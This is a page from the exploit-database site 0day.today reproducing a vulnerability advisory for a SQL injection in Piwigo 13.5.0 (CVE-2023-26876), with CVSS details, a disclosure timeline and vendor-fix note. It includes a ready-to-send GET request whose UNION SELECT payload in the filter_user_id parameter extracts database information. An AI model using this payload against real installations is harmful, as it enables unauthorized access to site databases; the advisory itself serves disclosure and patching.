0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Piwigo 13.5.0 SQL Injection Vulnerability
Author
Risk
[Security Risk High
]0day-ID
Category
Date add
CVE
Platform
Piwigo - Version 13.5.0
Author: Rodolfo Tavares
Tempest Security Intelligence - Recife, Pernambuco - Brazil
=====[ Table of Contents]==================================================
* Overview
* Detailed description
* Timeline of disclosure
* Thanks & Acknowledgments
* References
=====[ Vulnerability
Information]=============================================
* Class: improper Neutralization of Special Elements used in an SQL Command
('SQL injection') [CWE-89] improper Neutralization of Special Elements used
in an SQL Command ('SQL Injection')
* CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
* CVE-2023-26876
=====[ Overview]========================================================
* System affected : Piwigo - Version 13.5.0
* Software Version : Version 13.5.0 (other versions may also be affected).
* Impact : Piwigo 13.5.0 is vulnerable to SQL injection via
/filter_user_id parameter to the
admin.php?page=history&filter_image_id=&filter_user_id endpoint. An
attacker can exploit this by
executing SQL injection code to retrieve sensitive (P1) information and
performing unintended actions.
=====[ Detailed
description]=================================================
An authenticated user could run SQLi commands in the application and
retrieve sensitive information (P1) and database information. Using the
endpoint
http://localhost/admin.php?page=history&filter_image_id=&filter_user_id. To
explore just execute the following request:
GET
/piwigo/admin.php?page=history&filter_image_id=v3cna&filder_user_id=1%20UNION%20ALL%20SELECT
%20CONCAT(0x4141414141,IFNULL(CAST(VERSION()%20AS%20NCHAR),0x20),0x4141414141)--%20--
HTTP/1.1
Host: localhost
Cookie: pwg_id=cookies
Check the value contained in the *filter_image_id* variable at the request
response.
=====[ Timeline of
disclosure]===============================================
12/Fev/2023 - Responsible disclosure was initiated with the vendor.
17/Fev/2023 - Piwigo confirmed the issue;
08/Mar/2023 - CVE-2023-26876 was assigned and reserved.
09/Mar/2023 - The vendor fixed the vulnerability SQL Injection.
=====[ Thanks & Acknowledgments]========================================
* fxo,ravs
* Henrique Arcoverde < henrique.arcoverde () tempest.com.br >
* Tempest Security Intelligence / Tempest's Pentest Team [3]
=====[ References ]=====================================================
[1][https://cwe.mitre.org/data/definitions/89.html]
[2][https://github.com/Piwigo/Piwigo/issues/1876]
[3][https://www.tempest.com.br|http://www.tempest.com.br/]
[4][https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26876]
=====[ EOF ]===========================================================
# 0day.today [2024-11-15] #